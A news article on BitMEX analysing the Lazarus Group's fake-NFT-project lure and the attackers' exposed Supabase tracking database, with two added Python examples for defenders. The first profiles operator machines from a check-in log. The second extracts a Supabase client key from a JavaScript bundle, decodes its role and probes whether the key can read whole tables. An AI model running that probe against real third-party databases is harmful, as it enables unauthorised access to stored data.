BitMEX Developers Uncover Details About Lazarus Group Hackers After Accessing Their Database
BitMEX has released a detailed article on its blog outlining the many exploits of North Korea's Lazarus Group related to recent attacks against its crypto exchange. The Lazarus Group, notorious for targeting the crypto sector, employed various tricks and tactics to steal funds from unsuspecting crypto holders. Their malicious activities have targeted various exchanges, including Phemex and Bybit. They even approached a BitMEX employee with a phony project to disguise a phishing attempt and install malicious software on the employee's device.
However, BitMEX is now fighting back with a deep dive into the code the group used. In the process it found serious operational-security failures that defenders can turn to their advantage, including an exposed tracking database and the real origin IP addresses of the group's own machines. From the same data BitMEX can estimate the group's working hours and isolate individuals pivotal to its operations.
BitMEX also identified different tiers within the group: less skilled operators are assigned the phishing work, while highly skilled operators handle post-exploitation. The exchange blogged about measures for detecting breaches in real time, including an internal monitoring system for spotting infections.
BitMEX's investigation began when a Lazarus Group member contacted a BitMEX employee on LinkedIn with an offer to join a fake NFT project. Rather than simply ignoring the brazen phishing attempt, the exchange decided to dig in. The "recruiter" gave the employee access to a Next.js/React project on GitHub, which let the team analyze live Lazarus code.
The project was designed to entice the target into running malicious code on their machine. The researchers found that it reported back to a Supabase database under the attackers' control, holding one record per infected machine: username, hostname, operating system, geolocation, timestamp and IP address. Because the attackers' own machines showed up in that table far more often than a victim who runs the lure once, the team could separate developer and test machines from real victims by check-in frequency.
Most of the developers hid behind VPNs, but one slipped at some point and checked in from a machine's real address: a China Mobile IP geolocating to Jiaxing, China. BitMEX regards this as a major operational failure that could help identify the individual.
The database also revealed which VPN services the operators were using. To analyze it and hunt for such mistakes automatically, BitMEX wrote a script. Hackers make mistakes too, and those mistakes can be highly costly for them.
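The kind of analysis described above, as an added example rather than BitMEX's own script: given an export of the tracking table, it separates the attackers' own machines from victims by check-in count, flags operator check-ins that did not come through a VPN exit, tallies the VPN providers in use, and builds an hour-of-day histogram in a suspected home time zone. The rows, hostnames, addresses (RFC 5737 documentation ranges) and the IP-to-organization table are all constructed; the latter stands in for a real ASN/WHOIS lookup.

```python
from collections import Counter
from datetime import datetime, timedelta, timezone

# Constructed sample export of the attackers' tracking table. Column names
# follow the fields the article lists; hosts, users and addresses are made up,
# and the VPN provider names are placeholders, not real services.
ROWS = [
    {"username": "dev", "hostname": "DESKTOP-DEV01", "os": "Windows 10",
     "geo": "Amsterdam, NL", "ip": "192.0.2.10", "ts": "2025-05-12T02:14:00Z"},
    {"username": "dev", "hostname": "DESKTOP-DEV01", "os": "Windows 10",
     "geo": "Amsterdam, NL", "ip": "192.0.2.10", "ts": "2025-05-12T03:40:00Z"},
    {"username": "dev", "hostname": "DESKTOP-DEV01", "os": "Windows 10",
     "geo": "Frankfurt, DE", "ip": "192.0.2.77", "ts": "2025-05-13T01:05:00Z"},
    {"username": "dev", "hostname": "DESKTOP-DEV01", "os": "Windows 10",
     "geo": "Jiaxing, CN", "ip": "198.51.100.23", "ts": "2025-05-13T05:30:00Z"},
    {"username": "dev", "hostname": "DESKTOP-DEV01", "os": "Windows 10",
     "geo": "Amsterdam, NL", "ip": "192.0.2.10", "ts": "2025-05-14T02:50:00Z"},
    {"username": "alice", "hostname": "alice-mbp", "os": "macOS 14",
     "geo": "London, GB", "ip": "203.0.113.5", "ts": "2025-05-14T09:12:00Z"},
    {"username": "bob", "hostname": "bob-laptop", "os": "Windows 11",
     "geo": "Austin, US", "ip": "203.0.113.9", "ts": "2025-05-14T15:48:00Z"},
]

# Hypothetical stand-in for an ASN/WHOIS lookup keyed on the sample addresses.
# A real script would query a GeoIP/ASN database here.
IP_ORG = {
    "192.0.2.10": "VPN-Provider-A",
    "192.0.2.77": "VPN-Provider-B",
    "198.51.100.23": "China Mobile",
    "203.0.113.5": "Residential ISP (GB)",
    "203.0.113.9": "Residential ISP (US)",
}
VPN_ORGS = {"VPN-Provider-A", "VPN-Provider-B"}


def parse_ts(ts):
    return datetime.strptime(ts, "%Y-%m-%dT%H:%M:%SZ").replace(tzinfo=timezone.utc)


def classify_hosts(rows, min_checkins=3):
    """A victim runs the lure once; a machine that keeps checking in is the
    developers' own build or test box. Returns hostname -> label."""
    counts = Counter(r["hostname"] for r in rows)
    return {h: ("operator" if n >= min_checkins else "victim") for h, n in counts.items()}


def find_opsec_slips(rows, labels):
    """Check-ins from operator machines whose source address is not a known
    VPN exit: the real network, and so the real location, leaked."""
    return [r for r in rows
            if labels.get(r["hostname"]) == "operator"
            and IP_ORG.get(r["ip"], "unknown") not in VPN_ORGS]


def vpn_providers(rows, labels):
    """Which VPN services the operators rely on, by check-in count."""
    return Counter(IP_ORG.get(r["ip"], "unknown") for r in rows
                   if labels.get(r["hostname"]) == "operator"
                   and IP_ORG.get(r["ip"], "unknown") in VPN_ORGS)


def working_hours(rows, labels, utc_offset_hours):
    """Histogram of operator check-ins by local hour, shifting the UTC
    timestamps into a suspected home time zone (UTC+8 for the Jiaxing slip)."""
    shift = timedelta(hours=utc_offset_hours)
    hours = Counter()
    for r in rows:
        if labels.get(r["hostname"]) == "operator":
            hours[(parse_ts(r["ts"]) + shift).hour] += 1
    return hours


if __name__ == "__main__":
    labels = classify_hosts(ROWS)
    for slip in find_opsec_slips(ROWS, labels):
        print("OPSEC slip:", slip["hostname"], slip["ip"], IP_ORG[slip["ip"]], slip["geo"])
    print("VPN providers:", dict(vpn_providers(ROWS, labels)))
    print("Operator hours (UTC+8):", sorted(working_hours(ROWS, labels, 8).items()))
```

The check-in threshold is the knob that matters: set it too low and a victim who re-ran the installer is mislabelled as an operator, too high and a rarely used test VM is missed. In practice one would also key on username plus hostname, since the same operator tends to appear across several VMs.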
According to BitMEX, the operators have varying technical abilities and sit in a hierarchy. That can be exploited by looking for the mistakes the less skilled members make. One of them had tried to reuse a program named 'BeaverTail' but implemented it incorrectly, nearly exposing a personal IP address.
Mistakes like this let BitMEX categorize the machines in the database so that novice operators' errors stand out. JavaScript deobfuscation was a large part of the work, because the Lazarus Group relies heavily on obfuscated code; the team used tools such as Webcrack's symbol renaming to make the malware readable.
The BitMEX team had deobfuscated earlier samples and was prepared for the task. This time, however, the code contained a new function that connected to a Supabase database and wrote details about the victim's machine to it. Supabase lets a developer stand up a Postgres database with an auto-generated REST API in minutes, so the attackers needed no API layer of their own.
BitMEX's developers also knew that programmers often fail to lock such a database down. The client key embedded in the code is meant only for writing check-ins, but unless access rules restrict it, the same key can read the whole table, and that is what opened the door to further analysis of the attackers.
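The check a responder would run once the bundle is deobfuscated, as an added example that is not BitMEX's script: pull the Supabase project URL and client key out of the JavaScript, decode the key (Supabase client keys are JWTs whose payload carries the project reference and the role), and issue the same PostgREST read any holder of that key can issue, reporting whether the table comes back. The project reference, the key (built in code with a garbage signature) and the bundle fragment are constructed; the `http_get` parameter exists so the probe can be exercised against a stub without touching the network.

```python
import base64
import json
import re
from urllib.error import HTTPError
from urllib.parse import urlencode
from urllib.request import Request, urlopen


def _b64url_encode(raw):
    return base64.urlsafe_b64encode(raw).rstrip(b"=").decode()


def _b64url_decode(s):
    return base64.urlsafe_b64decode(s + "=" * (-len(s) % 4))


# Constructed: a fake client key with the claim layout Supabase keys use
# (iss/ref/role). The project reference is made up and the signature is junk.
FAKE_REF = "abcdefghijklmnopqrst"
FAKE_ANON_KEY = ".".join([
    _b64url_encode(json.dumps({"alg": "HS256", "typ": "JWT"}).encode()),
    _b64url_encode(json.dumps({"iss": "supabase", "ref": FAKE_REF, "role": "anon",
                               "iat": 1700000000, "exp": 2000000000}).encode()),
    _b64url_encode(b"not-a-real-signature"),
])

# Constructed: a fragment of a bundle after deobfuscation has restored readable
# names. Table name and function are placeholders.
SAMPLE_BUNDLE = f'''
const supabase = createClient("https://{FAKE_REF}.supabase.co", "{FAKE_ANON_KEY}");
async function report(info) {{
  await supabase.from("victims").insert([info]);
}}
'''

CLIENT_RE = re.compile(r'createClient\(\s*["\'](https://[^"\']+)["\']\s*,\s*["\']([^"\']+)["\']')
TABLE_RE = re.compile(r'\.from\(\s*["\']([^"\']+)["\']\s*\)')


def extract_client(js):
    """Recover (project URL, client key, table names) from deobfuscated JS."""
    m = CLIENT_RE.search(js)
    if not m:
        return None
    return m.group(1).rstrip("/"), m.group(2), sorted(set(TABLE_RE.findall(js)))


def key_claims(key):
    """The key is a JWT; its payload names the project ('ref') and the role."""
    return json.loads(_b64url_decode(key.split(".")[1]))


def build_request(base_url, key, table, limit=1000, offset=0):
    """The PostgREST read any client holding the key can issue. Supabase
    serves every table in the public schema under /rest/v1/; unless a
    row-level policy restricts the 'anon' role, the rows come back."""
    qs = urlencode({"select": "*", "limit": limit, "offset": offset})
    return Request(f"{base_url}/rest/v1/{table}?{qs}",
                   headers={"apikey": key, "Authorization": f"Bearer {key}"})


def default_http_get(req):
    try:
        with urlopen(req, timeout=10) as resp:
            return resp.status, resp.read()
    except HTTPError as e:
        return e.code, e.read()


def probe_table(base_url, key, table, http_get=default_http_get):
    """Classify the response: 200 with rows means the key reads the table;
    200 with [] means the table is empty or row-level security filters the
    role (PostgREST filters rather than errors); anything else is a denial."""
    status, body = http_get(build_request(base_url, key, table))
    if status == 200:
        rows = json.loads(body)
        verdict = "readable with client key" if rows else "empty or RLS filters anon"
        return {"table": table, "status": status, "rows": len(rows), "verdict": verdict}
    return {"table": table, "status": status, "rows": 0, "verdict": "denied"}


if __name__ == "__main__":
    base, key, tables = extract_client(SAMPLE_BUNDLE)
    print("project:", base, "tables:", tables)
    print("key claims:", key_claims(key))
    # Live probing needs network access; shown here against a stub response.
    fake = lambda req: (200, b'[{"hostname": "DESKTOP-DEV01"}]')
    print(probe_table(base, key, tables[0], http_get=fake))
```

The role claim is the first thing to look at: a key whose payload says `"role": "service_role"` bypasses row-level security entirely, so finding one embedded in a client bundle means the whole project is open, not just one table. Paginate with `limit`/`offset` when the table is large.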